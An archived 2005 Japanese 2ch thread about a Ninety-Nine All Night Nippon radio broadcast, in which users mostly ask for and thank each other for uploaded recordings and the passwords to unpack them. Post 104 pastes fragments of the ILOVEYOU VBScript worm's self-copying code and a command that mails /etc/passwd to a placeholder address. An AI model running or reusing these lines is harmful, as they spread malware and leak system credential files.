5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ナイティナインのANN祭の後

1 :名無しさん@ON AIR:2005/10/21(金) 04:55:54 ID:Dorczm3W
寂しい

2 :名無しさん@ON AIR:2005/10/21(金) 05:00:56 ID:Gr72dtEf
ナインティナインのオールナイトニッポンその5
http://live21.2ch.net/test/read.cgi/liveradio/1129828717/
ナインティナインのオールナイトニッポンその4
http://live21.2ch.net/test/read.cgi/liveradio/1129823797/
ナインティナインのオールナイトニッポンその3
http://live21.2ch.net/test/read.cgi/liveradio/1129823771/
ナインティナインのオールナイトニッポンその2
http://live21.2ch.net/test/read.cgi/liveradio/1129823750/
ナインティナインのオールナイトニッポンその1
http://live21.2ch.net/test/read.cgi/liveradio/1129691115/

一応貼っとくけど、いらんかっただろに

3 :名無しさん@ON AIR:2005/10/21(金) 05:11:07 ID:vdCVcwa0
Qちゃんのパスなしってどういう意味?
パスなくて入れない。

4 :名無しさん@ON AIR:2005/10/21(金) 05:15:57 ID:3tmlcvnp
フルバージョンはどこにありますか?

5 :名無しさん@ON AIR:2005/10/21(金) 05:17:36 ID:i8wkYZo7
itumono神様光臨してください。

6 :名無しさん@ON AIR:2005/10/21(金) 05:27:36 ID:pigF5Ean
Qちゃんアリガト

7 :名無しさん@ON AIR:2005/10/21(金) 05:36:46 ID:3tmlcvnp
頂きました。

8 :名無しさん@ON AIR:2005/10/21(金) 05:39:13 ID:Gr72dtEf
ツンデレだけ放置しときますので

9 :名無しさん@ON AIR:2005/10/21(金) 05:46:37 ID:Xu2zSSib
ツンデレ今行ったら10秒だった。あざーす

10 :名無しさん@ON AIR:2005/10/21(金) 05:47:11 ID:GasODaz/
>>5
itsumono
くの30
ku30_1763.zip

11 :名無しさん@ON AIR:2005/10/21(金) 05:50:46 ID:yXl889pd
Qちゃんの解凍のパス教えてください

12 :名無しさん@ON AIR:2005/10/21(金) 05:51:53 ID:lcEIAz9J
>>10
まってました〜頂きますm(_ _)m

13 :名無しさん@ON AIR:2005/10/21(金) 05:51:57 ID:FlOKZk1U
永久の解凍のpass教えて

14 :名無しさん@ON AIR:2005/10/21(金) 05:53:11 ID:yXl889pd
くの30って苺のことですか?

15 :名無しさん@ON AIR:2005/10/21(金) 05:57:31 ID:yXl889pd
Qちゃんの解凍パスがわからぬorz

苺もサーバーが落ちたみたいだし

16 :名無しさん@ON AIR:2005/10/21(金) 05:57:35 ID:SnOEPqOO
Qちゃんも永久もパスは>>8の目欄を見ろ。
くの30ってのは、くっくっくのことだ。
覚えておけよー。

17 :名無しさん@ON AIR:2005/10/21(金) 05:58:05 ID:yHoL4Obf
今日異様に重い

18 :名無しさん@ON AIR:2005/10/21(金) 05:59:13 ID:jfIfcThS
どこも落とせない。何故だ・・・

19 :名無しさん@ON AIR:2005/10/21(金) 05:59:25 ID:w1LBfSfX
いつものありがとうございます

20 :名無しさん@ON AIR:2005/10/21(金) 05:59:28 ID:yXl889pd
>>16
どうもです。
Qちゃんで結局落としました。

21 :名無しさん@ON AIR:2005/10/21(金) 06:00:52 ID:yXl889pd
アップのテンプレとか作りませんか
ロダもリンク貼って


【ファイル名】
【アプロダ名】
【パス名】



22 :名無しさん@ON AIR:2005/10/21(金) 06:01:11 ID:qSB4pH+r
即消しすんなら上げるなボケ>856

23 :名無しさん@ON AIR:2005/10/21(金) 06:08:26 ID:WMcHxUiQ
>>10
いつも乙です

24 :名無しさん@ON AIR:2005/10/21(金) 06:14:33 ID:WMcHxUiQ
>>22
全然即消しじゃないじゃんか
お前がトロイだけだろ( ´,_ゝ`)プッ


25 :名無しさん@ON AIR:2005/10/21(金) 06:15:05 ID:MoDxiCYY
>>22
じゃあスルーしろボケ

26 :名無しさん@ON AIR:2005/10/21(金) 06:19:50 ID:K5CWzyGM
>>10
d

テンプレいらなくね?
1rk行けば解るじゃん

27 :名無しさん@ON AIR:2005/10/21(金) 06:23:15 ID:EaF4sUya
>>21
そこまでする必要はない


28 :名無しさん@ON AIR:2005/10/21(金) 06:27:50 ID:SQHUkAMS
神d

29 :名無しさん@ON AIR:2005/10/21(金) 06:30:30 ID:qSB4pH+r
>>24
もう一度見て来い

30 :名無しさん@ON AIR:2005/10/21(金) 06:42:14 ID:jfIfcThS
>>8
毎週本当にサンクスです。
今週もいただきました。

オネムネ申のはやっと落とせたんだが
itsumonoネ申のが全く落ちてくる気配さえない・・・

31 :名無しさん@ON AIR:2005/10/21(金) 06:52:19 ID:a6BjGqo0
>>21
うpのテンプレてwwwwwwwwwww
バカかこいつwwwwwwwwwwww


32 :名無しさん@ON AIR:2005/10/21(金) 06:55:22 ID:hHf4fNTb
itsumonoネ申の落とせたけどなぜか解凍パスが合わないorz

33 :名無しさん@ON AIR:2005/10/21(金) 06:58:34 ID:qSB4pH+r
上げたくなけりゃ初めから上げるなってこったな

34 :名無しさん@ON AIR:2005/10/21(金) 06:59:55 ID:MoDxiCYY
いまだにツンデレ繋がる気配なし。仕事行くか。
>>8さん放置お願いします。

35 :名無しさん@ON AIR:2005/10/21(金) 07:01:22 ID:MoDxiCYY
>>33
おまえも欲しいなら素直になれよ。居座って文句は見苦しい。

36 :名無しさん@ON AIR:2005/10/21(金) 07:16:30 ID:BQd856aG
つんでれ 入れないのでどのたか拡散おねがいします

37 :名無しさん@ON AIR:2005/10/21(金) 07:25:39 ID:iLq0dWnv
時間かかってもいいから、止まるのは勘弁してほしい

38 :名無しさん@ON AIR:2005/10/21(金) 07:26:00 ID:BQd856aG
ごめん いつもの いただきました

39 :名無しさん@ON AIR:2005/10/21(金) 07:31:45 ID:HFJbGo5J
つんでれ50だけ入れない

40 :名無しさん@ON AIR:2005/10/21(金) 07:36:59 ID:uOe/Bzz3
itumonoいあたらないんですけど。
苺は甘い?30行ってもありませんが

41 :名無しさん@ON AIR:2005/10/21(金) 07:37:49 ID:hHf4fNTb
>>40
>>10に書いてあるじゃん

42 :名無しさん@ON AIR:2005/10/21(金) 07:40:24 ID:uOe/Bzz3
開いてもku09なんだけど

43 :名無しさん@ON AIR:2005/10/21(金) 07:41:19 ID:lGYEdYRa
いちごのどこにあるんだろう?

44 :名無しさん@ON AIR:2005/10/21(金) 07:41:59 ID:lGYEdYRa
あげてしまいますた

45 :名無しさん@ON AIR:2005/10/21(金) 07:49:01 ID:DWKMAMDt
解凍パスがわからない。。。

46 :名無しさん@ON AIR:2005/10/21(金) 08:30:45 ID:iLq0dWnv
>>10
やっと落とせました。
いつもありがとうございます

47 :名無しさん@ON AIR:2005/10/21(金) 08:36:16 ID:yEYhX0p9
Qちゃんいただきました。いつもありがとう。

48 :名無しさん@ON AIR:2005/10/21(金) 08:37:08 ID:y0qT3bPF
ツンデレ、パス分からん
神様HELP

49 :名無しさん@ON AIR:2005/10/21(金) 08:40:05 ID:SKJmhIkf
おはようございます。苺のいただきました。神ありがとう。

50 :名無しさん@ON AIR:2005/10/21(金) 08:45:09 ID:ZO4IS4/n
ツンデレ頂きました ありがとうございます!

>>48
ストラップに頼りすぎ

51 :名無しさん@ON AIR:2005/10/21(金) 08:45:24 ID:fe1xdiwO
そんなに昨日おもしろかったの??

52 :名無しさん@ON AIR:2005/10/21(金) 09:03:39 ID:1Rc1nZh0
キューちゃんのパスわかんない…誰か教えてください

53 :名無しさん@ON AIR:2005/10/21(金) 09:25:31 ID:3wzAFlDr
パスは「胃カメラ」

54 :名無しさん@ON AIR:2005/10/21(金) 10:00:54 ID:xhDUvL6Z
1rkのリンクからツンデレ消えてない?
先週はいけたんだけど・・・

55 :名無しさん@ON AIR:2005/10/21(金) 10:06:54 ID:2ogRuacy
Qちゃんのパス、俺もわからん
どこぞの親切な神様がずばっとおしえてくれ

56 :名無しさん@ON AIR:2005/10/21(金) 10:07:47 ID:XlAYjN/I
ツンデレいただきました あざーす!

57 :名無しさん@ON AIR:2005/10/21(金) 10:10:52 ID:FIgzdxq4
どなたか苺30にいつもの上げて頂けませんか?

58 :名無しさん@ON AIR:2005/10/21(金) 10:18:04 ID:3Sft0aur
くっくっく 重すぎ

昔のテレホ帯なみ

59 :名無しさん@ON AIR:2005/10/21(金) 10:22:47 ID:EjmCuHK8
DLしたけど、パスワードがわかりません。
教えてください。

60 :名無しさん@ON AIR:2005/10/21(金) 10:28:48 ID:PhegBK0L
Qのパスお願いします…!

61 :名無しさん@ON AIR:2005/10/21(金) 10:39:58 ID:SKJmhIkf
苺30にCMカット神の勝手ながらあげときました。
パスは神が指定したやつそのままです。

62 :名無しさん@ON AIR:2005/10/21(金) 10:45:40 ID:2ogRuacy
>61
GOOD JOB!
でもパス分からん
なぜそこまで皆パス隠す?

63 :名無しさん@ON AIR:2005/10/21(金) 10:52:09 ID:7NnBYxeW
パスは
>>8のメアド欄

ちゃんと過去レス嫁

64 :名無しさん@ON AIR:2005/10/21(金) 10:58:42 ID:MrP5d3Zf
>>61
いただきますたd

65 :名無しさん@ON AIR:2005/10/21(金) 11:02:16 ID:aFqY5R11
ストラップに頼り過ぎ



66 :名無しさん@ON AIR:2005/10/21(金) 11:02:45 ID:2ogRuacy
だからストラップに頼りすぎって何だよ!

67 :名無しさん@ON AIR:2005/10/21(金) 11:08:28 ID:NyB0tJuz
55 名前:名無しさん@ON AIR[] 投稿日:2005/10/21(金) 10:06:54 ID:2ogRuacy
Qちゃんのパス、俺もわからん
どこぞの親切な神様がずばっとおしえてくれ

65 名前:名無しさん@ON AIR[sage] 投稿日:2005/10/21(金) 11:02:16 ID:aFqY5R11
ストラップに頼り過ぎ

66 名前:名無しさん@ON AIR[] 投稿日:2005/10/21(金) 11:02:45 ID:2ogRuacy
だからストラップに頼りすぎって何だよ!

68 :名無しさん@ON AIR:2005/10/21(金) 11:11:28 ID:SKJmhIkf
>>66
ストラップに頼りすぎ

の全文がそのままパスだから、コピペしてパス欄に入れる。

69 :名無しさん@ON AIR:2005/10/21(金) 11:11:38 ID:BRx+Aenc
>>66
ヲタの集まりなんだから理解できない馬鹿は来るな

70 :名無しさん@ON AIR:2005/10/21(金) 11:19:36 ID:EjmCuHK8
頼り過ぎ と 頼りすぎ の違いね。


71 :名無しさん@ON AIR:2005/10/21(金) 11:25:19 ID:SKJmhIkf
>>70
フォローd

72 :名無しさん@ON AIR:2005/10/21(金) 11:35:22 ID:2ogRuacy
みんな親切や、ありがとう

73 :名無しさん@ON AIR:2005/10/21(金) 12:10:03 ID:kyweZwcc
毎週思うんだけど、うpろだにうpされた奴って何曜日くらいまでは残ってるんだ?

日曜日くらい?

74 :名無しさん@ON AIR:2005/10/21(金) 12:10:57 ID:Xu2zSSib
もう夏は終わったというのに・・・
ひどすぎるな、これは。住民が入れ替わったのか。

75 :名無しさん@ON AIR:2005/10/21(金) 12:23:53 ID:K0Wu9lY7
>>8
神最高
ありがとう

76 :名無しさん@ON AIR:2005/10/21(金) 12:24:15 ID:j++xdyLu
ちょっと覗いてみたら・・・
どこもかしこも馬鹿ばっかりかよ('A`)


あ、神いつもd。

77 :名無しさん@ON AIR:2005/10/21(金) 12:58:52 ID:kk4GIvuI
てかsage進行にすりゃいいじゃん

78 :名無しさん@ON AIR:2005/10/21(金) 13:13:28 ID:OWrUqdGR
>>8
神さまトン。
今日は50だったのね・・・・
30さがしてたorz

79 :名無しさん@ON AIR:2005/10/21(金) 13:15:18 ID:bTcp0SK/
・特定番組のスレッドを立てる場合その回だけで使い切り、次回以降への保守は行わないよう御願いします。

・目当ての番組が放送中でなければラジオ番組板でお願いします。

・ラジオ実況板での以下のような書き込み・スレッドは禁止です。
 ◎実況と無関係な雑談やスレ立て
 ◎一般聴取者に対する誹謗中傷
 ◎個人を挑発・罵倒するような書き込み&個人情報
その他の削除対象は削除ガイドラインをご覧下さい。

80 :名無しさん@ON AIR:2005/10/21(金) 13:18:56 ID:438KU4Kc
>>61
本当にありがとう。
放送直後は、全然ダウンできなかったから
明日にしようと思ったら、消えてたんで助かります。

そして神様ありがとう、毎度助かります。

81 :名無しさん@ON AIR:2005/10/21(金) 13:37:54 ID:VVkNlMMM
夏休み以降、なんで馬鹿こんなに増えちゃったんだろうな
ワザワザ房を弾くためにパス分かりにくくしてくれてるのに
堂々とパス晒す馬鹿もいるし、ロダまでテンプレに入れようとか言う馬鹿も出てくるし
うpされるのが当たり前だと思ってるのかよwww


82 :名無しさん@ON AIR:2005/10/21(金) 13:40:28 ID:FA70rrat
それは無駄だな
最初から全くのクローズドな掲示板でない2chでファイルをアップしたなんて言うのが
そもそもの大間違いであるし
そんな事書いたら「どこにあるのか?」と大騒ぎになるのは厨房でも分かる
大騒ぎになるのがいやなら、アップしたなんて2chに書くなよ。消えろ

83 :名無しさん@ON AIR:2005/10/21(金) 14:08:15 ID:VVkNlMMM
sageも出来ない房が何を偉そうに( ´,_ゝ`)

84 :名無しさん@ON AIR:2005/10/21(金) 14:34:46 ID:0iqcKais
乞食のみなさん、カリカリしないようにお願いします。

85 :名無しさん@ON AIR:2005/10/21(金) 15:58:40 ID:TC1UeSDj
>>61
ありがとー

86 :名無しさん@ON AIR:2005/10/21(金) 16:36:37 ID:FIgzdxq4
>>61
あなたは仏様です!助かりましたありがとうございました 。゚(゚´Д`゚)゜。
いつもの神様もありがとうございます m(_ _)m


87 :名無しさん@ON AIR:2005/10/21(金) 16:41:12 ID:uOe/Bzz3
苺は甘い?30見てもないんだけど

88 :名無しさん@ON AIR:2005/10/21(金) 16:47:07 ID:FIgzdxq4
>>87
つku0950.zip *1020_CMCUT

89 :名無しさん@ON AIR:2005/10/21(金) 17:11:10 ID:YnJLsq8K
itumonoありがとー

90 :名無しさん@ON AIR:2005/10/21(金) 17:34:49 ID:VVkNlMMM
>>87
ツンデレ50のNoカットとCMカットセットのヤツ落とせば?

91 :名無しさん@ON AIR:2005/10/21(金) 17:35:36 ID:G1IGoj5W
神サンクス子

92 :名無しさん@ON AIR:2005/10/21(金) 17:52:18 ID:JjGsii8O
俺の解凍ソフトのパスワードは半角英数字しか入力できなかった件wwww

>>88
横から頂きます
感謝

93 :92:2005/10/21(金) 17:56:46 ID:JjGsii8O
うはwwwwこれもパス一緒かwwwww
テラカナシス(´・ω・`)

くので頑張るか・・・

94 :名無しさん@ON AIR:2005/10/21(金) 18:21:18 ID:GRgvqFeM
ここは本谷ANNナイナイSPの臨時実況スレです。


95 :名無しさん@ON AIR:2005/10/21(金) 18:29:27 ID:f6xR9ZGv
イチゴとかツンデレとか、DLして解凍してもファイルがないのは何故…?
教えて、神様・・・orz

96 :名無しさん@ON AIR:2005/10/21(金) 19:16:38 ID:Br0UeL42
解凍ソフトがpass付きに対応してない希ガス

97 :名無しさん@ON AIR:2005/10/21(金) 21:00:18 ID:GFulFtu6


自分があげてる訳でも無いのに偉そうに語ってる ID:VVkNlMMM君って面白い






面白い ID:VVkNlMMM君の発言をみんなに見てもらうためにage






98 :名無しさん@ON AIR:2005/10/21(金) 21:20:59 ID:CUGtVG8t
itsumono神のが一向に落ちてこない・・・
よろしければ、別のところにうpして下さい。

99 :名無しさん@ON AIR:2005/10/21(金) 21:45:46 ID:m9uGWp1D
ツンデレ50に一向に入れない(´・ω・`)
くっくっくも無理だし・・・・・

100 :名無しさん@ON AIR:2005/10/21(金) 21:53:15 ID:m9uGWp1D
>>88
うほぁ・・・・・・・半角しか無理だった・・・・(´・ω・`)


101 :名無しさん@ON AIR:2005/10/21(金) 22:03:21 ID:f6xR9ZGv
>>96
+Lhaca ってなってんだけど、これでは無理なのかな?

102 :名無しさん@ON AIR :2005/10/21(金) 22:13:45 ID:3bdC5ER8
>>100
ヒント:コピー→Ctrl+v

103 :100:2005/10/21(金) 22:20:08 ID:m9uGWp1D
行けましたw
アリガト!(´▽`)

104 :名無しさん@ON AIR:2005/10/21(金) 22:29:02 ID:xRpXqrKR
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

105 :名無しさん@ON AIR:2005/10/21(金) 22:30:38 ID:CWNBAxQB
>>88
今帰ってきて諦めてたんだけど・・・感謝。ってパスって・・ヒントでもいいっす・・おしえてくらはい・・

106 :100:2005/10/21(金) 22:38:20 ID:m9uGWp1D
>>105
「ストラップに頼り過ぎ」

「」の中の文字をコピペして解凍ねw

>>8を参照ねw

107 :名無しさん@ON AIR:2005/10/21(金) 22:46:14 ID:CWNBAxQB
88さん・・106さんに感謝・・・
てかなんでこんなパスなんやろ・・「ANN」ではじかれて「あれ・・?あれ・・?」と混乱した

108 :名無しさん@ONAIR:2005/10/21(金) 23:25:22 ID:DWKMAMDt
>>102
本当にありがとうございます!感謝!

109 :名無しさん@ON AIR:2005/10/21(金) 23:53:05 ID:Br0UeL42
>>101
Version0.7x系は対応してないけど

110 :名無しさん@ON AIR:2005/10/22(土) 01:02:08 ID:4XoDB6zG
本谷ANNゲストらすい

111 :名無しさん@ON AIR:2005/10/22(土) 03:06:24 ID:xiwRKG+x
結局、今になっても
どこからも落とせず...orz


112 :名無しさん@ON AIR:2005/10/22(土) 03:10:20 ID:mMJEEbRL
今日のオールナイト出てたんだよな?

113 :名無しさん@ON AIR:2005/10/22(土) 03:20:22 ID:xqau4IWw
>>111
苺30にまだあるではないか

114 :名無しさん@ON AIR:2005/10/22(土) 03:33:43 ID:xiwRKG+x
>>113
解凍で失敗する
Macじゃ駄目なの?

115 :名無しさん@ON AIR:2005/10/22(土) 03:39:18 ID:imr8skgW
本谷有希子のナイトをあげてくれる神様はいないっすか?

116 :名無しさん@ON AIR:2005/10/22(土) 03:46:46 ID:YtUyFiuD
>>88
今週はもう諦めていたところ…いただきます m(_ _)m

117 :名無しさん@ON AIR:2005/10/22(土) 04:40:00 ID:1czGyeMh
>>114
>>96

118 :名無しさん@ON AIR:2005/10/22(土) 04:50:20 ID:xiwRKG+x
>>117
StuffIt Expanderじゃダメッすか?


119 :名無しさん@ON AIR:2005/10/22(土) 05:02:06 ID:SlrI0c04
・特定番組のスレッドを立てる場合その回だけで使い切り、次回以降への保守は行わないよう御願いします。

・目当ての番組が放送中でなければラジオ番組板でお願いします。

・ラジオ実況板での以下のような書き込み・スレッドは禁止です。
 ◎実況と無関係な雑談やスレ立て
 ◎一般聴取者に対する誹謗中傷
 ◎個人を挑発・罵倒するような書き込み&個人情報
その他の削除対象は削除ガイドラインをご覧下さい。

120 :名無しさん@ON AIR:2005/10/22(土) 05:02:23 ID:xWxR/D+z
苺のどこにあるのでしょうか?もうなくなった?

121 :名無しさん@ON AIR:2005/10/22(土) 09:32:54 ID:MRC7KsJe
>>120
あるよ

122 :名無しさん@ON AIR:2005/10/22(土) 09:47:37 ID:rZIjNshf
>>102
すげえ!wまたひとつ勉強になった吉宗であった。
てかパス分かってても解凍できなかったファイル捨てなきゃ良かった・・・Orz

123 :名無しさん@ON AIR:2005/10/22(土) 10:27:16 ID:y0UWmUXS
脳がPCに追いついていかない厨房が多すぎるな

124 :名無しさん@ON AIR:2005/10/22(土) 13:40:15 ID:AS1nmm2A
完全に板違いじゃねえか
サッと取ってサッと帰れや

125 :名無しさん@ON AIR:2005/10/22(土) 13:47:37 ID:EDdFirlH
岡村「いまもサックス練習してるよ」
武田「うそですよ〜してないですよ」
岡村「なんでウソてわかんねん!」
武田「だってストラップないじゃないですかぁ」
矢部「そう、首からかけるやつな」
岡村「ストラップ?ストラップくれやぁ」
矢部「なくした?」
岡村「なくしたぁお前からもろたストラップなくしたんや」
武田「なくした?なくしちゃったんですか?」
岡村「おう、どっか・・置いてきた、俺の不注意で」
武田「ストラップないってことは練習してないんですよ」
岡村「なんでやねん!お前はストラップに頼りすぎやねん!」
武田「ぶわぁははははぁぁはは」
矢部「はまったぁ武田君はまったよ」


126 :名無しさん@ON AIR:2005/10/22(土) 15:26:04 ID:iQ4kxMnx
99/ナインティナイン/ナイナイ総合スレ part3
http://tmp5.2ch.net/test/read.cgi/download/1128677574/

専用スレあるのに板違いなファイルのやり取りしてるなよ。
>>1も放送終了後に実況しないスレ立てるなよ

127 :名無しさん@ON AIR:2005/10/22(土) 19:18:34 ID:yaQksEwe
>>126の書き込みのおかげで、落ちる予定が延命できたw





128 :名無しさん@ON AIR:2005/10/23(日) 01:19:00 ID:LADihgqW
>>125
そこおもしろかったね

129 :名無しさん@ON AIR:2005/10/23(日) 11:36:02 ID:rrTrKpyU
やべっち誕生日お(・∀・)め(・∀・)で(・∀・)と(・∀・)う!

130 :名無しさん@ON AIR:2005/10/23(日) 16:12:04 ID:ypr4tfSA
itsumonoの神のCM Noカット分を再うpお願いできませんでしょうか。

131 :名無しさん@ON AIR:2005/10/24(月) 01:01:48 ID:hH0C8qdO
やべさん何歳?

132 :名無しさん@ON AIR:2005/10/24(月) 03:40:27 ID:+p1uR7qz
三枝師匠

133 :名無しさん@ON AIR:2005/10/24(月) 10:00:34 ID:s9JJEBPj
ありがとうございましたー

134 :名無しさん@ON AIR:2005/10/24(月) 23:38:00 ID:5oV4Lm1V
ナイナイの祭りの後 静まるラジオを背に
星を眺めていた ヨゴレのあるがままに
ボツられた行き場の無い 押し寄せる職人魂に
本当の笑い教えてよ 壊れかけのRadio


135 :名無しさん@ON AIR:2005/10/28(金) 01:21:32 ID:b9LM9aLj
1000ならドラクエ1からドラクエ8まで一気にやる

136 :名無しさん@ON AIR:2005/10/28(金) 12:40:37 ID:giqYKH2K
今週のファイルは無いのでしょうか?

137 :名無しさん@ON AIR:2005/10/28(金) 12:43:30 ID:MuG7INlP
>>136
保守荒らしは氏ね

138 :名無しさん@ON AIR:2005/10/28(金) 12:45:04 ID:giqYKH2K
1530 ann
とはどこのことでしょう?

139 :名無しさん@ON AIR:2005/10/28(金) 13:46:53 ID:5Rs1zL3V
1511

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)